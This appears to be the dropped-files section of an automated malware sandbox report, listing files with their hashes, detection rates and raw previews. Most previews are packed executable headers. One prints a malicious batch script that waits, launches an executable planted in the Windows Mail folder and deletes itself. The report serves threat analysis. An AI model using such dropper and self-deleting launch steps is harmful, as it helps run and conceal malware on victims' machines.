                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:j2pAB7RdBZKHkW+Ylz5/uyOD5s74fR37jUoApZlFBfk1:CpAB9dB7Ov2ZD5ZfR3/4Zi1
                                                                                                                                                                              MD5:3FA15EFF861AFD187384FC8431CEA917
                                                                                                                                                                              SHA1:124726069F46976952024229FC8E2469420E591D
                                                                                                                                                                              SHA-256:E6650011EF561D7025D47F3E774B513C85FFEA9D41569DD09AEBD52A04204E93
                                                                                                                                                                              SHA-512:49A2C62ED0F956128F5143303FC81A33C87654626C35E0C7DA7E7E2AF998CDAD22D1DA097F8C164ADA465127A395B26E72F482B72937277715EAAFE41A85CEF7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....]....}.2===OO?w..vw.....}...M..lLF."...F.8Gl....D."g.6...(....I... $0...........:.N..#.|.<.SU_}Uk...[.....|3..uMX.87+...{.z.-..F.....F.2..:.vn.{.s^oD.H_F=.W/..=-}g.P?kM...Z..b.@.vK...Q;..a.w.O.....SVmPj3WvD..buK.'.}[.w.....-}...[Q.m...]..}......*..I..W.E..^.Y......bW.e....}.......... ..^...D\...o.=.@...U.}.....3C.~...:...C...'[....'....G......A.KOT...5c...+.}_x.%......c.....}........<Gc..1..~..k,........C...=<.;o..x0..\..~..0f.C..?..D.'.....+.}@.c2..<..=..<.j....(...1...Z...../.s@.G.~2.U.X.P....}.-.b.>.P....c......'.q...............9...V.......7..P.k~..9/....D....X.O;v.EaB.....b..8.b....4.?.S.cnjm./^.6.8..s~..W..q..qn....ns..}...{.}c....3..#..P.......g...}....].`.....mm.{R..=.&......ki.1?>.....?v..R..bcv.........c`..]b|.8.Q.o.....cr.M..iv".#.7-.c...{B..S..N.~#......}.;-.k...XK;~Z\.c.....V.1Sb..w....OLy.8.....g.c6.~m..B}.;S^m.;RL....bN...c.X....
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x708, 10 symbols, created Thu Aug 1 10:41:40 2024, 1st section name ".debug$S"
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1984
                                                                                                                                                                              Entropy (8bit):4.586247609902551
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:HFK9AIO0/m+DfHJlfwKRfCWYN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+e4:ZhkmkpKKJCWYyluOulajfqXSfbNtmhZZ
                                                                                                                                                                              MD5:4F6F19EF5EA2954E160556D260EE4AC1
                                                                                                                                                                              SHA1:DA138DB3B14DE5FB33198FAA4DD1460CDB92C900
                                                                                                                                                                              SHA-256:573AAE6C546FAD7531F98A6E00F7A8F8B6349C87001498457CF67572E5066D0D
                                                                                                                                                                              SHA-512:F13A71DCFB61885F232631AF6AA42324DEBE4D32F09D5790A0E6B5A09A78B698BFDBD3CA024827D60C6037685419964C2B04DFA20B18EF38C4F8DF13BEF1CAF2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:L...df.f.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........p...................@..@........=....c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES5269.tmp.-.<....................a..Microsoft (R) CVTRES.}.=..cwd.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu Aug 1 10:41:41 2024, 1st section name ".debug$S"
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1372
                                                                                                                                                                              Entropy (8bit):4.135473740012819
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:Haq9s+fLg/4DfHpwK9GofVkNWI+ycuZhN2jakSnsPNnqS+d:fLg/2yKDVk41ul2ja3n8qSe
                                                                                                                                                                              MD5:26C09CA6F0BA23F398FF4049D0BE3F46
                                                                                                                                                                              SHA1:E8E56E8C77AE5C5F99661948A455430EF780065A
                                                                                                                                                                              SHA-256:FC09718EED9D93474F7C6A23FA1DB7F1CC201C39567166F54A4EA0F805C4CFE5
                                                                                                                                                                              SHA-512:CCD3DBFADD80503CCD86D1DAA883C4D0256B017E484B899A68C85B02CE64B38A7ADDF0E20D75A242FAB3E2A275CC1923F25E66360EA9B93441A2513D9557DEF4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:L...ef.f.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP................K.?......u...R..........4.......C:\Users\user\AppData\Local\Temp\RES5528.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.1.f.f.b.x.q.0...d.l.l.....(.....L.e.g.a.
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):25
                                                                                                                                                                              Entropy (8bit):4.403856189774723
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:80aKDM9:8bKDM9
                                                                                                                                                                              MD5:0BC5A75B1420A33596CD2EA3CC28932B
                                                                                                                                                                              SHA1:4304DF3E47BC569B2E5A7941699D45B500802B0B
                                                                                                                                                                              SHA-256:4EE7DD4433299B9CB1770BAAE9D3CB646A1B986DC0634868BE91F34021C393B7
                                                                                                                                                                              SHA-512:D3905CC8A6759FEB800B6C3BF71F9F6A928DE14FA7636492B4CB5E08A63F5C224ADE92BB953D97D979F3365D61C77920AA51EA60A11F0647B325ACFBFD69A248
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:8nHYuMsSQtsJNQjNrP6WqexaU
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                              Entropy (8bit):5.317736277230626
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mbZj4I5SMLBV1QEUMKLVyBktKcKZG1t+kiE2J5xAIk:hCRLuVFOOr+DER5SMLFgMQVyKOZG1wkr
                                                                                                                                                                              MD5:2DA75F9F9CD1F62E5F99BF52375F01C4
                                                                                                                                                                              SHA1:297E009A3D6E81C4AC66D36F4DC39CE646ED7189
                                                                                                                                                                              SHA-256:BB15B6C3E4AE35589A40A334F3D7D390BF88A0FE43F0FCB883531824CFE7AFF5
                                                                                                                                                                              SHA-512:8F9C9A1BBA1FCD59EC6F30148090F87D0C3AD73CBFC04BF2A1ED0D1E3D2CFDFA12E0709EC5A59E6B32736882D58A0A5F920719A3626120D9E6EE71CCFC592641
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\windows mail\RKjtGQcyio.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\VbvGgiO8yC.bat"
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17874291
                                                                                                                                                                              Entropy (8bit):7.9984186921086025
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:393216:OoNLbkNjOUjUQaTv/5f3LIHr8NSpeLWKdAZxBzcPS4wvF:OohVBNvR3MHr4+KdCkwvF
                                                                                                                                                                              MD5:A4FE53D7F7F29D0065F8B589A7B61112
                                                                                                                                                                              SHA1:FF2527ABBDD8294CF93636AC2D5B6F1AEBB71546
                                                                                                                                                                              SHA-256:3216A09A28E0B5107BD6808F8490E73C4B1A4AD3A5C9AEF13FF211DFC4CE9181
                                                                                                                                                                              SHA-512:FADBE9B2A1851F8CA3AD26F9215F77BEFF7403A48F095E104D1C48A89900556C83DA11737930F225AE0A5E3B7CA48CAB37845249D3C9A2CB0EC3C1FBD6A05F76
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 51%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..6..6..6....V.6....T.'6....U.6..)MZ.6..)M..6..)M..6..)M..6..N$.6..N4.6..6..7..'M..6..'M..6..'MX.6..'M..6..Rich.6..................PE..L......e...............!.F..........P........`....@.......................................@.............................4.......P.......D....................p..\%......T...............................@............`..x....... ....................text....E.......F.................. ..`.rdata.......`.......J..............@..@.data...XG... ......................@....didat.......p......................@....rsrc...D...........................@..@.reloc..\%...p...&..................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):98224
                                                                                                                                                                              Entropy (8bit):6.452201564717313
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                                                              MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                                                              SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                                                              SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                                                              SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):48920
                                                                                                                                                                              Entropy (8bit):7.80237293184675
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:4AZgCxM2GXvgErzHwiVGP2lhBHgdcmQYnTYf9WeW/pAHILCVjew5YiSyv3YJPxWb:4A/MZJHzVGPwRHYTiWeWCHILCVjd7SyL
                                                                                                                                                                              MD5:FBA120A94A072459011133DA3A989DB2
                                                                                                                                                                              SHA1:6568B3E9E993C7E993A699505339BBEBB5DB6FB0
                                                                                                                                                                              SHA-256:055A93C8B127DC840AC40CA70D4B0246AC88C9CDE1EF99267BBE904086E0B7D3
                                                                                                                                                                              SHA-512:221B5A2A9DE1133E2866B39F493A822060D3FB85F8C844C116F64878B9B112E8085E61D450053D859A63450D1292C13BD7EC38B89FE2DFA6684AC94E090EC3AA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .................b....................................................`..........................................{..H....y.......p....... ..,............{.......................................n..8...........................................UPX0....................................UPX1................................@....rsrc........p......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):109336
                                                                                                                                                                              Entropy (8bit):7.935778322595252
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:bIUqPfSKN4sAaLojnvWxbpdNPyspILOqlJSgxDM:bllIMWxpdNP0J3M
                                                                                                                                                                              MD5:7CDC590AC9B4FFA52C8223823B648E5C
                                                                                                                                                                              SHA1:C8D9233ACBFF981D96C27F188FCDE0E98CDCB27C
                                                                                                                                                                              SHA-256:F281BD8219B4B0655E9C3A5516FE0B36E44C28B0AC9170028DD052CA234C357C
                                                                                                                                                                              SHA-512:919C36BE05F5F94EC84E68ECCA43C7D43ACB8137A043CF429A9E995643CA69C4C101775955E36C15F844F64FC303999DA0CBFE5E121EB5B3FFB7D70E3CD08E0B
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):36120
                                                                                                                                                                              Entropy (8bit):7.666263818459696
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:ZkmOGHOaDC16x5fWN9/xx5qFp6OILOIeQ5YiSyv/UPxWElHBT:LfHOcCyO/Rq6OILOIeC7SyEPxDF
                                                                                                                                                                              MD5:659A5EFA39A45C204ADA71E1660A7226
                                                                                                                                                                              SHA1:1A347593FCA4F914CFC4231DC5F163AE6F6E9CE0
                                                                                                                                                                              SHA-256:B16C0CC3BAA67246D8F44138C6105D66538E54D0AFB999F446CAE58AC83EF078
                                                                                                                                                                              SHA-512:386626B3BAD58B450B8B97C6BA51CE87378CDDF7F574326625A03C239AA83C33F4D824D3B8856715F413CFB9238D23F802F598084DBD8C73C8F6C61275FDECB5
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P.........../.......................................P............`..........................................K..P....I.......@.......................K.......................................;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):87832
                                                                                                                                                                              Entropy (8bit):7.91873819228598
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:wZ6by758mldpnwpd+cjwZaO4jA5e0RBcS8iGyfowoQmXsoILZ14T7SyiPxq:O7HdSpd+co4AhRiXT8aILZ14TIxq
                                                                                                                                                                              MD5:864B22495372FA4D8B18E1C535962AE2
                                                                                                                                                                              SHA1:8CFAEE73B7690B9731303199E3ED187B1C046A85
                                                                                                                                                                              SHA-256:FC57BD20B6B128AFA5FAAAC1FD0CE783031FAAF39F71B58C9CACF87A16F3325F
                                                                                                                                                                              SHA-512:9F26FE88ACA42C80EB39153708B2315A4154204FC423CA474860072DD68CCC00B7081E8ADB87EF9A26B9F64CD2F4334F64BC2F732CD47E3F44F6CF9CC16FA187
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 4%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." ..... ...............................................................`.........................................4...L....................@.........................................................8...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):43800
                                                                                                                                                                              Entropy (8bit):7.716600949168409
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:Qp4KUJsCditRTPL/f9hpDd1ciTceZS/VgpjrpILLwjm/5YiSyv6PxWEads:QpghditRDL/1rcOcT/V4rpILLwjmx7Sd
                                                                                                                                                                              MD5:49F87AEC74FEA76792972022F6715C4D
                                                                                                                                                                              SHA1:ED1402BB0C80B36956EC9BAF750B96C7593911BD
                                                                                                                                                                              SHA-256:5D8C8186DF42633679D6236C1FEBF93DB26405C1706F9B5D767FEAB440EA38B0
                                                                                                                                                                              SHA-512:DE58D69228395827547E07695F70EF98CDAF041EBAAE0C3686246209254F0336A589B58D44B7776CCAE24A5BC03B9DC8354C768170B1771855F342EECC5FEAD4
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....p...........k....................................................`.............................................P.......h............ ..<...........X........................................w..8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc................n..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):880569
                                                                                                                                                                              Entropy (8bit):5.682993312079324
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:cgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMN+:cgYJiVBFLa2VIVwx/fpEWe+MN+
                                                                                                                                                                              MD5:C4989BCEB9E7E83078812C9532BAEEA7
                                                                                                                                                                              SHA1:AAFB66EBDB5EDC327D7CB6632EB80742BE1AD2EB
                                                                                                                                                                              SHA-256:A0F5C7F0BAC1EA9DC86D60D20F903CC42CFF3F21737426D69D47909FC28B6DCD
                                                                                                                                                                              SHA-512:FB6D431D0F2C8543AF8DF242337797F981D108755712EC6C134D451AA777D377DF085B4046970CC5AC0991922DDF1F37445A51BE1A63EF46B0D80841222FB671
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1112856
                                                                                                                                                                              Entropy (8bit):7.937513332106868
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:AfVpBeOErQiWG03fz7UuJ7G/y1Pcg8rWgrnNFF+EoIFAVMBU1CPwDv3uFfJN:4pBejNWGoXFJ7ay14rWgrnNxoIFAy+1Y
                                                                                                                                                                              MD5:BBC1FCB5792F226C82E3E958948CB3C3
                                                                                                                                                                              SHA1:4D25857BCF0651D90725D4FB8DB03CCADA6540C3
                                                                                                                                                                              SHA-256:9A36E09F111687E6B450937BB9C8AEDE7C37D598B1CCCC1293EED2342D11CF47
                                                                                                                                                                              SHA-512:3137BE91F3393DF2D56A3255281DB7D4A4DCCD6850EEB4F0DF69D4C8DDA625B85D5634FCE49B195F3CC431E2245B8E9BA401BAAA08778A467639EE4C1CC23D8D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..........&..n5...&...................................7...........`......................................... .5.......5.h.....5.......2...............7......................................z5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc.........5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1514776
                                                                                                                                                                              Entropy (8bit):7.99244120733247
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:24576:AqrG9EWpLjdwiANNmpsWKCixQvvkZVqezQv4ivFf1BiuY1Gb+Dyl3/lJYjhYPkm9:A9xdvANw3J72q016ie6Ds/lJYjhq/
                                                                                                                                                                              MD5:4A6AFA2200B1918C413D511C5A3C041C
                                                                                                                                                                              SHA1:39CA3C2B669ADAC07D4A5EB1B3B79256CFE0C3B3
                                                                                                                                                                              SHA-256:BEC187F608507B57CF0475971BA646B8AB42288AF8FDCF78BCE25F1D8C84B1DA
                                                                                                                                                                              SHA-512:DBFFB06FFFF0542200344EA9863A44A6F1E1B783379E53DF18580E697E8204D3911E091DEB32A9C94B5599CDD54301B705B74E1F51104151CF13B89D57280A20
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." ..... .......P/..jE..`/..................................`F...........`...........................................E.......E.d.....E......`B..............PF......................................vE.8...........................................UPX0.....P/.............................UPX1..... ...`/.....................@....rsrc.........E.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26392
                                                                                                                                                                              Entropy (8bit):7.406438297877472
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:7iRf5SV1a/KjrtZa7gJXEOBILQGe6vHQIYiSy1pCQ6wYPxh8E9VF0NyvrO:7GxSVQiVpUOBILQGek5YiSyvrYPxWEl6
                                                                                                                                                                              MD5:B6DE7C98E66BDE6ECFFBF0A1397A6B90
                                                                                                                                                                              SHA1:63823EF106E8FD9EA69AF01D8FE474230596C882
                                                                                                                                                                              SHA-256:84B2119ED6C33DFBDF29785292A529AABBF75139D163CFBCC99805623BB3863C
                                                                                                                                                                              SHA-512:1FC26E8EDC447D87A4213CB5DF5D18F990BBA80E5635E83193F2AE5368DD88A81FDDFB4575EF4475E9BF2A6D75C5C66C8ED772496FFA761C0D8644FCF40517CA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):296728
                                                                                                                                                                              Entropy (8bit):7.985011478309557
                                                                                                                                                                              Encrypted:false
